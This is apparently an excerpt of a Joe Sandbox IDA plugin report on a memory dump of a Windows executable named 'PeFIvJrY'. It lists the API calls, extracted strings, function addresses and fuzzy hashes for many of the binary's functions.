                                • Instruction ID: be55c0b78ed87615b4372f3cf54fd7a299f350cd1ceba28edf7562b4731fd341
                                • Opcode Fuzzy Hash: bb14ab59d989622441ad99d6a401b98fcc74a1e9bb167a369adf7ce91b01f895
                                • Instruction Fuzzy Hash: B2617C70E00268DFDF11DFA9D945B9EBBB4FF08300F10416AE905AB381EB75AA05CB55
                                APIs
                                • GetModuleHandleW.KERNEL32(wmiutils.dll,A05DD77D), ref: 003FC248
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,wbem\wmiutils.dll,00000011), ref: 003FC325
                                • FreeLibrary.KERNEL32(00000000), ref: 003FC346
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Library$FreeHandleLoadModule
                                • String ID: unknown$wbem\wmiutils.dll$win32$wmiutils.dll
                                • API String ID: 2140536961-2702560950
                                • Opcode ID: 66701c6c5b007f50b9aeba37b66afd90d49c5a3de748b07bdce4ab7b5a2d7826
                                • Instruction ID: 82674daec2e53c3a88b56e6ac121183c7fb8a26ef30575ba53e9ae2a6221ffeb
                                • Opcode Fuzzy Hash: 66701c6c5b007f50b9aeba37b66afd90d49c5a3de748b07bdce4ab7b5a2d7826
                                • Instruction Fuzzy Hash: 41411975E1020CDBDB02DF64C985BBEBBB5EF44754F24802AE901A7381DB786E04CB95
                                APIs
                                • _ValidateLocalCookies.LIBCMT ref: 00427877
                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0042787F
                                • _ValidateLocalCookies.LIBCMT ref: 00427908
                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00427933
                                • _ValidateLocalCookies.LIBCMT ref: 00427988
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                • String ID: =pB$csm
                                • API String ID: 1170836740-1392728282
                                • Opcode ID: 9beb9f819c0e7aee48d55578513884957f918fe10c26fb20dc6de018ae5477eb
                                • Instruction ID: 7f369cdfd96b1624893db58878b682a399046fce48cbe8082f9a1018aa76e7c5
                                • Opcode Fuzzy Hash: 9beb9f819c0e7aee48d55578513884957f918fe10c26fb20dc6de018ae5477eb
                                • Instruction Fuzzy Hash: 2841E674F042289BCF10EF69D885A9E7FA0EF05314F54809BF8185B352D739AE51CB99
                                APIs
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00403F52
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403F95
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403FD6
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00404017
                                • GetLastError.KERNEL32 ref: 00404064
                                • GetLastError.KERNEL32 ref: 00404086
                                • GetLastError.KERNEL32 ref: 004040AA
                                • GetLastError.KERNEL32 ref: 004040CE
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressErrorLastProc
                                • String ID:
                                • API String ID: 199729137-0
                                • Opcode ID: 7a975aa2f69a64b8912791f7b76017d45fc91f5708b384b5faeda784ea3770ba
                                • Instruction ID: cc098cb1151b383e2ffab1f06cc949a55b04afcad7da7766f18be12336fe413a
                                • Opcode Fuzzy Hash: 7a975aa2f69a64b8912791f7b76017d45fc91f5708b384b5faeda784ea3770ba
                                • Instruction Fuzzy Hash: E1516B74E042099FDB04CFA8C8547AEBFF0AF89304F1480BED955E7381DB7A9A448B95
                                APIs
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 003E3F3A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ObjectSingleWait
                                • String ID:
                                • API String ID: 24740636-0
                                • Opcode ID: 84c88ec11cf5f22c201f13ead85bdd2dc5f1e645d099c0380c5a868933ddb3cc
                                • Instruction ID: ec45167b500bca493d425871c7191aa06c67224458661d38b978016529ceecda
                                • Opcode Fuzzy Hash: 84c88ec11cf5f22c201f13ead85bdd2dc5f1e645d099c0380c5a868933ddb3cc
                                • Instruction Fuzzy Hash: 4B411B35B0011897DB11EB66EC05BBEB3A5DFC8314F10027AFD069B3C1EB359E158656
                                APIs
                                  • Part of subcall function 00424CCD: RtlAcquireSRWLockShared.NTDLL(?), ref: 00424CD3
                                • FreeLibrary.KERNEL32(00000000), ref: 00411DFC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AcquireFreeLibraryLockShared
                                • String ID: PZ$P|$mfe_trust_init$mfe_trust_uninit$mfe_trust_validate
                                • API String ID: 1419617460-861292972
                                • Opcode ID: c37e4f46ed42f099d2c91c293caba41ec9f3038134d93d37d442686cab4d814a
                                • Instruction ID: 9d36f415e6a5a691c7dcde1f1375f85db7c23b313bcd781a8ce84057274afa88
                                • Opcode Fuzzy Hash: c37e4f46ed42f099d2c91c293caba41ec9f3038134d93d37d442686cab4d814a
                                • Instruction Fuzzy Hash: 84C1F470E00248DFDB10CFA8C945BDEBBB5EF45310F1081AEE519A7391D778AA84CB95
                                APIs
                                • VariantClear.OLEAUT32(0043A69D), ref: 003E49B8
                                • VariantInit.OLEAUT32(?), ref: 003E49EF
                                • VariantCopy.OLEAUT32(?,?), ref: 003E4A0D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$ClearCopyInit
                                • String ID: 8uD$hvD$hwD
                                • API String ID: 1785138364-2802233680
                                • Opcode ID: a3a8f27852ca483c9313393acd19162d27842485d9dce2e4226fef50532c1187
                                • Instruction ID: 7c2e03fe07a992cf4669f34fb7091261f546f4672e9f55cf9da4e72f80f561a7
                                • Opcode Fuzzy Hash: a3a8f27852ca483c9313393acd19162d27842485d9dce2e4226fef50532c1187
                                • Instruction Fuzzy Hash: 38B19A71E002A89BEB11EF65DC06BAEBB75EF08314F144329F805AB2C1E7756D40CB99
                                APIs
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003F1220
                                  • Part of subcall function 00425D49: RtlEnterCriticalSection.NTDLL(00464694), ref: 00425D54
                                  • Part of subcall function 00425D49: RtlLeaveCriticalSection.NTDLL(00464694), ref: 00425D91
                                • SetLastError.KERNEL32(00000000), ref: 003F12A9
                                • MapWindowPoints.USER32(000701F0,00000000,?,00000001), ref: 003F12C0
                                • GetLastError.KERNEL32 ref: 003F12CA
                                • SetWindowPos.USER32(000701F0,00000000,?,?,00000000,00000000,00000005), ref: 003F1337
                                • UpdateWindow.USER32(000701F0), ref: 003F1346
                                • Concurrency::cancel_current_task.LIBCPMT ref: 003F135B
                                  • Part of subcall function 00425CFF: RtlEnterCriticalSection.NTDLL(00464694), ref: 00425D09
                                  • Part of subcall function 00425CFF: RtlLeaveCriticalSection.NTDLL(00464694), ref: 00425D3C
                                  • Part of subcall function 00425CFF: RtlWakeAllConditionVariable.NTDLL ref: 00425DB3
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CriticalSection$Window$EnterErrorLastLeave$Concurrency::cancel_current_taskConditionInfoParametersPointsSystemUpdateVariableWake
                                • String ID:
                                • API String ID: 3866933946-0
                                • Opcode ID: 6c50c08ff0c79b8fcdaebee20e9c8251b0612af626e15f99e3e22c07615a09c0
                                • Instruction ID: 9446048998eb57219bc4f5386aa59110e5eed35e216ca59276237540b085543e
                                • Opcode Fuzzy Hash: 6c50c08ff0c79b8fcdaebee20e9c8251b0612af626e15f99e3e22c07615a09c0
                                • Instruction Fuzzy Hash: 7BA190B1900319DFDB21CF91EC45BEEB7B4BB05704F1086AEE504AB281EBB56A84CF55
                                APIs
                                • GetDC.USER32(00000000), ref: 003F0BD4
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 003F0BEA
                                • GetDeviceCaps.GDI32(?,0000005A), ref: 003F0BF3
                                • ReleaseDC.USER32(00000000,?), ref: 003F0BFA
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003F0C7E
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 003F0ED5
                                • UpdateWindow.USER32(?), ref: 003F0EE0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CapsDeviceWindow$InfoParametersReleaseSystemUpdate
                                • String ID:
                                • API String ID: 4287873706-0
                                • Opcode ID: b091b315b09dfc03fff0fe7eaf3575e450c1f81752fef18073f479d1dbcdabb0
                                • Instruction ID: cc67cc4ee5b5daefad256917fb514197e6ea04062104999c15acd86a699fc150
                                • Opcode Fuzzy Hash: b091b315b09dfc03fff0fe7eaf3575e450c1f81752fef18073f479d1dbcdabb0
                                • Instruction Fuzzy Hash: B8A1E632C10F58DADB13DF78DC417AAB778BF6A395F119326F90576062EB30A8C18644
                                APIs
                                • __alldvrm.LIBCMT ref: 003F9069
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003F908B
                                • __Xtime_get_ticks.LIBCPMT ref: 003F90DE
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003F9169
                                • __Mtx_unlock.LIBCPMT ref: 003F91C1
                                 Memory Dump Source
                                 • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Mtx_unlockXtime_get_ticks__alldvrm
                                • String ID:
                                • API String ID: 554389402-0
                                • Opcode ID: ce5d7909dfe8c0174c59397b75143f14abb84948a767dbbea9f02af211bd2039
                                • Instruction ID: 29e55edc298b633a429d1ff03a3af67201cb61bf8d3756a92a2504895e7b8b0a
                                • Opcode Fuzzy Hash: ce5d7909dfe8c0174c59397b75143f14abb84948a767dbbea9f02af211bd2039
                                • Instruction Fuzzy Hash: 8961F071E002199BCF15DFA9DC85BAEBBB9AF89314F15822BF615A7381D6349C00CB94
                                APIs
                                • GetFileAttributesExW.KERNEL32(?,00000000,?,?,?), ref: 00424EC8
                                • GetLastError.KERNEL32 ref: 00424ED2
                                • ___std_fs_open_handle@16.LIBCPMT ref: 00424F32
                                Similarity
                                • API ID: AttributesErrorFileLast___std_fs_open_handle@16
                                • String ID:
                                • API String ID: 617199260-0
                                • Opcode ID: 282827c405338a3b7b5e745c927413c10c39439ac2086690d117783d87557043
                                • Instruction ID: f48ab97fd8ed163a04aadf726f69280f92e9732587cdbf4dffd01ba17145541c
                                • Opcode Fuzzy Hash: 282827c405338a3b7b5e745c927413c10c39439ac2086690d117783d87557043
                                • Instruction Fuzzy Hash: B961A070B007159BDB14CF68E941BAAB7B4FF85310F85421AEC25EB380E778D911CBA9
                                APIs
                                • Wow64DisableWow64FsRedirection.KERNEL32(?,?,?,A05DD77D,003E0000,?), ref: 00406365
                                • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,02000000,00000000), ref: 0040637B
                                • GetLastError.KERNEL32 ref: 00406383
                                • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 0040638F
                                • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,02000000,00000000,?,?,A05DD77D,003E0000,?), ref: 004063B7
                                • GetLastError.KERNEL32 ref: 004063CC
                                • CloseHandle.KERNEL32(00000000), ref: 00406445
                                Similarity
                                • API ID: Wow64$CreateErrorFileLastRedirection$CloseDisableHandleRevert
                                • String ID:
                                • API String ID: 1949712479-0
                                • Opcode ID: 2397e08833eb244b08a7b0001e44fcfc395f95831d1dad749054d01fc9c7353b
                                • Instruction ID: b2f1dc2ad22cdd57b7cd8635ca89a7a7b516d73a786a53ef923829ca3ede8573
                                • Opcode Fuzzy Hash: 2397e08833eb244b08a7b0001e44fcfc395f95831d1dad749054d01fc9c7353b
                                • Instruction Fuzzy Hash: E971D371D01218DBDF20CFA8D945BAEBBB0AF44714F25412AEC16B73C0D7786915CB99
                                APIs
                                  • Part of subcall function 003F4E70: __Mtx_init_in_situ.LIBCPMT ref: 003F4ECC
                                  • Part of subcall function 003FA470: SysAllocStringLen.OLEAUT32(00000000,?), ref: 003FA4FA
                                  • Part of subcall function 003FFE90: QueryUnbiasedInterruptTimePrecise.KERNELBASE ref: 003FFEFD
                                  • Part of subcall function 003E7C00: SysAllocStringLen.OLEAUT32(00000000,00000014), ref: 003E7C16
                                • GetCurrentThreadId.KERNEL32 ref: 003F71C6
                                • SysFreeString.OLEAUT32(?), ref: 003F71F8
                                • SysFreeString.OLEAUT32(?), ref: 003F7202
                                • SysFreeString.OLEAUT32(?), ref: 003F720C
                                Similarity
                                • API ID: String$Free$Alloc$CurrentInterruptMtx_init_in_situPreciseQueryThreadTimeUnbiased
                                • String ID: dummy$signal_event
                                • API String ID: 1410445602-762517529
                                • Opcode ID: c5eb7bc52745dea85514a517ebbebe9562eaf397dc9179c7a98f8612e3beb077
                                • Instruction ID: 1f9238673bcbbf7be56c3428bdc788ccbb177b42bc919d83997d0cf093a75982
                                • Opcode Fuzzy Hash: c5eb7bc52745dea85514a517ebbebe9562eaf397dc9179c7a98f8612e3beb077
                                • Instruction Fuzzy Hash: 405129B5E042189FDB15DFA9D880BAEBBF9FF48310F10456AE915AB341EB349944CB90
                                APIs
                                • GetCurrentProcessId.KERNEL32(00000040,?,A05DD77D,?,004614D0), ref: 003E53D9
                                • CreateMutexExW.KERNEL32(00000000,?,00000000,001F0001,?,?,?,?,004614D0), ref: 003E5410
                                • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,?,?,004614D0), ref: 003E5433
                                • ReleaseMutex.KERNEL32(00000000), ref: 003E54C5
                                • CloseHandle.KERNEL32(?), ref: 003E550B
                                  • Part of subcall function 003E3040: GetLastError.KERNEL32(A05DD77D,?,?,?,0043A5D0,000000FF), ref: 003E306E
                                Similarity
                                • API ID: Mutex$CloseCreateCurrentErrorHandleLastObjectProcessReleaseSingleWait
                                • String ID: Local\SM0:%lu:%lu:%hs
                                • API String ID: 908355122-2363530481
                                • Opcode ID: 62d3eff1a6d9cbfb795ef46ece1c99a0fb733246716e6ca402d7f6a4b3bf3d4c
                                • Instruction ID: 574a86eec19033b8e6c78928635e02e8199913f702d7f352d10d27a13ef56016
                                • Opcode Fuzzy Hash: 62d3eff1a6d9cbfb795ef46ece1c99a0fb733246716e6ca402d7f6a4b3bf3d4c
                                • Instruction Fuzzy Hash: DF416C75940178ABDB12DF56DC49BAB73A9DB85314F100368F80E973C1DB349E40CB60
                                APIs
                                • WaitForSingleObjectEx.KERNEL32(00000001,000000FF,00000000,?,00000000), ref: 003E558F
                                • CloseHandle.KERNEL32(00000000), ref: 003E5600
                                • CloseHandle.KERNEL32(00000000), ref: 003E560E
                                • CloseHandle.KERNEL32(00000001), ref: 003E561C
                                • GetProcessHeap.KERNEL32(00000000), ref: 003E5625
                                • HeapFree.KERNEL32(00000000), ref: 003E562C
                                • ReleaseMutex.KERNEL32(00000000), ref: 003E563B
                                Similarity
                                • API ID: CloseHandle$Heap$FreeMutexObjectProcessReleaseSingleWait
                                • String ID:
                                • API String ID: 1978293137-0
                                • Opcode ID: 5d92a804a7cdd3c70a03551741bb0a171b70d102ae0f26c56e922923a0ec1d88
                                • Instruction ID: c768cc7c643e5f4c8b1be30df02730806a6a16320a08dc817f6763fdb769f364
                                • Opcode Fuzzy Hash: 5d92a804a7cdd3c70a03551741bb0a171b70d102ae0f26c56e922923a0ec1d88
                                • Instruction Fuzzy Hash: 7E31C175200AA59BDB26AF6AD844B2773DAAF91318F55462CF48AC72C1CB30EC01CB24
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003F4D89
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003F4DBC
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 003F4DEF
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 003F4E0B
                                Similarity
                                • API ID: ___std_exception_copy___std_exception_destroy
                                • String ID: 0q>$@ >
                                • API String ID: 2970364248-3763285519
                                • Opcode ID: ac12285b465ced2d03091c0ee4ad146dbef5e28358423164c83f1ea412dd8369
                                • Instruction ID: 52d9a980ac4228ffde9dc38c7b24868e9379e9e1f46a84c6509b6b0bc5ded343
                                • Opcode Fuzzy Hash: ac12285b465ced2d03091c0ee4ad146dbef5e28358423164c83f1ea412dd8369
                                • Instruction Fuzzy Hash: A141AEB0E0034D9BDF11CFA4D885BEEBBB4BF48308F24422EE515A7241EBB95945CB95
                                APIs
                                • IsWindow.USER32 ref: 003F2878
                                • MonitorFromWindow.USER32(00000002), ref: 003F288E
                                • GetMonitorInfoW.USER32(00000000,?), ref: 003F28D6
                                • SetWindowPos.USER32(00000000,?,?,000002DA,000001FE,00000004), ref: 003F2912
                                • GetLastError.KERNEL32 ref: 003F2925
                                Similarity
                                • API ID: Window$Monitor$ErrorFromInfoLast
                                • String ID: (
                                • API String ID: 3978234620-3887548279
                                • Opcode ID: 6a24ca217ce0d79e67c27634ae0b28d7a9ec8df64da1e56816d0cf5be464a83e
                                • Instruction ID: ac78ed9750f91c4497b344d1b77b477a004c6c1a519ff447b972692804b9cd03
                                • Opcode Fuzzy Hash: 6a24ca217ce0d79e67c27634ae0b28d7a9ec8df64da1e56816d0cf5be464a83e
                                • Instruction Fuzzy Hash: 002106352002009FD3119B25EC2AF2B77A9EBC5714F45863DFA8557190EBB19C11CB9A
                                APIs
                                • GetModuleHandleW.KERNEL32(Advapi32.dll,A05DD77D), ref: 003EF0E4
                                • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 003EF0FB
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000,A05DD77D), ref: 003EF130
                                • RegCloseKey.ADVAPI32(00000000), ref: 003EF143
                                Similarity
                                • API ID: AddressCloseHandleModuleOpenProc
                                • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                • API String ID: 823179699-3913318428
                                • Opcode ID: e90e44cccf9ae82d18f933ca8e6a56a597d2792258881f9a735cbd0215d37f9f
                                • Instruction ID: 1dcfc303c2fc841ebd9b6aa2a2a63e4f2678e78f49ea0d0f8d9c19cc7543ec71
                                • Opcode Fuzzy Hash: e90e44cccf9ae82d18f933ca8e6a56a597d2792258881f9a735cbd0215d37f9f
                                • Instruction Fuzzy Hash: 4B316171A04259EFDB15CF55DC45BABBBB8EB48710F104639F915E7280D7B4A900CB54
                                APIs
                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,A05DD77D,?,00431536,?,?,?,00000000), ref: 004314EA
                                Similarity
                                • API ID: FreeLibrary
                                • String ID: api-ms-$ext-ms-
                                • API String ID: 3664257935-537541572
                                • Opcode ID: 57b9ef3e82dc7e7c84475f0e38d427de66db5ffd7e68d036d3f5188ee3b24cf4
                                • Instruction ID: b67ddcd709ffd76ed9c11d9dec0299e3848cd22c091e8148d8ac6bdc8926718c
                                • Opcode Fuzzy Hash: 57b9ef3e82dc7e7c84475f0e38d427de66db5ffd7e68d036d3f5188ee3b24cf4
                                • Instruction Fuzzy Hash: 0021E731A01211B7CB219F61EC45B5B7758AFA6764F251222FD06A73E0EA78ED00C6D9
                                APIs
                                • IsWindow.USER32 ref: 003F26BE
                                • GetWindowLongW.USER32(000000F0), ref: 003F26D4
                                • GetLastError.KERNEL32 ref: 003F26F1
                                • SetWindowLongW.USER32(000000F0,?), ref: 003F2713
                                • GetLastError.KERNEL32 ref: 003F2726
                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000027), ref: 003F274A
                                • GetLastError.KERNEL32 ref: 003F275D
                                Similarity
                                • API ID: Window$ErrorLast$Long
                                • String ID:
                                • API String ID: 3349814059-0
                                • Opcode ID: ad169c5069168937617b34822b63d35b03d06573a49a94f6e3b18fa7579b0432
                                • Instruction ID: 6a49f90b422fc24aaf49155cfc50a80260ac1f7c2ad900def5dde405a8d45416
                                • Opcode Fuzzy Hash: ad169c5069168937617b34822b63d35b03d06573a49a94f6e3b18fa7579b0432
                                • Instruction Fuzzy Hash: 2911E335644258ABE7227725AC0AB2B3F19E741765F150230FB54851F2EAB28C14866E
                                APIs
                                • 759783B0.OLE32(00000000), ref: 0040849E
                                • 759783B0.OLE32(00000000,?,-00000002), ref: 0040852A
                                • 759783B0.OLE32(00000000), ref: 004085C6
                                • 759783B0.OLE32(00000000,?,-00000002), ref: 00408698
                                • 759783B0.OLE32(00000000), ref: 0040872B
                                • 759783B0.OLE32(-00000002,-00000002), ref: 0040875F
                                Similarity
                                • API ID: 759783
                                • String ID:
                                • API String ID: 3308533907-0
                                • Opcode ID: bc4376195842df28560b5221f4cc94db706b8cb2b9cb17dac727634f4e04927f
                                • Instruction ID: 307a3f3e13ac97278003f1885a75dfb276761d1b81388d445c0c1b72fc73cc78
                                • Opcode Fuzzy Hash: bc4376195842df28560b5221f4cc94db706b8cb2b9cb17dac727634f4e04927f
                                • Instruction Fuzzy Hash: F6C19070D0121AEFDB04CF68DA54B9EFBB4BF15304F10826EE854A7391DB79AA44CB94
                                APIs
                                • LocalFree.KERNEL32(?,?), ref: 0041BB45
                                • GetLastError.KERNEL32(?), ref: 0041BB51
                                • LocalFree.KERNEL32(00000000,?), ref: 0041BBB7
                                • LocalFree.KERNEL32(00000000,?), ref: 0041BC25
                                • LocalFree.KERNEL32(00000000), ref: 0041BC64
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeLocal$ErrorLast
                                • String ID: 1.2.840.113549.1.9.5
                                • API String ID: 4216857709-925610549
                                • Opcode ID: 39543add12455dab4cfd73ba5d5940706ad4d347c30e9b030b26d6cc3b4b34d4
                                • Instruction ID: 327cbf5ca370525d674217bee7950bf4e12cb719ae96fc60b2cea0672c44f898
                                • Opcode Fuzzy Hash: 39543add12455dab4cfd73ba5d5940706ad4d347c30e9b030b26d6cc3b4b34d4
                                • Instruction Fuzzy Hash: 8971AC75A042098FCB14CF69D8817EEBBB1EF49310F2481AAD841A7341DB3AAD44CBD4
                                APIs
                                • GetProcessHeap.KERNEL32 ref: 003E2A14
                                • HeapFree.KERNEL32(00000000,?), ref: 003E2A1D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 003E2A3F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003E2A46
                                • GetProcessHeap.KERNEL32 ref: 003E2A8B
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 003E2A95
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Heap$Process$Free$Allocate
                                • String ID:
                                • API String ID: 168621272-0
                                • Opcode ID: d1c62de5b9237e6ba5d45555fabd0be752717fe4a3aa779c45c39c73a52e8785
                                • Instruction ID: 829d6712c4d8f8b63f4bd272b0ce0e07ba1f4417b9924b3caeea837744346e5b
                                • Opcode Fuzzy Hash: d1c62de5b9237e6ba5d45555fabd0be752717fe4a3aa779c45c39c73a52e8785
                                • Instruction Fuzzy Hash: 5521087A5012219BDB218F56EC44BA7BB6CFF15335F10423AFA15CB280DB719C11CBA0
                                APIs
                                • GetLastError.KERNEL32(00000001,?,00427B9D,004271DC,00424333,A05DD77D,?,?,?,00000008,0043E73C,000000FF,?,00402444,00000008,00000008), ref: 00427BB4
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00427BC2
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00427BDB
                                • SetLastError.KERNEL32(00000000,00427B9D,004271DC,00424333,A05DD77D,?,?,?,00000008,0043E73C,000000FF,?,00402444,00000008,00000008,A05DD77D), ref: 00427C2D
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: dbb4ea759f1d86ac83c40dd66327dea335b03d15d7f98e5c6ff0f94cbf2b88ef
                                • Instruction ID: e016f826375f520073410a82cc90b752a98fdac70f20fca12df1a228fb83daad
                                • Opcode Fuzzy Hash: dbb4ea759f1d86ac83c40dd66327dea335b03d15d7f98e5c6ff0f94cbf2b88ef
                                • Instruction Fuzzy Hash: 2A01F13231E3315EA7222BB7BC8596B2A44DB22379BA0023FF210452F1EE6A4C02914D
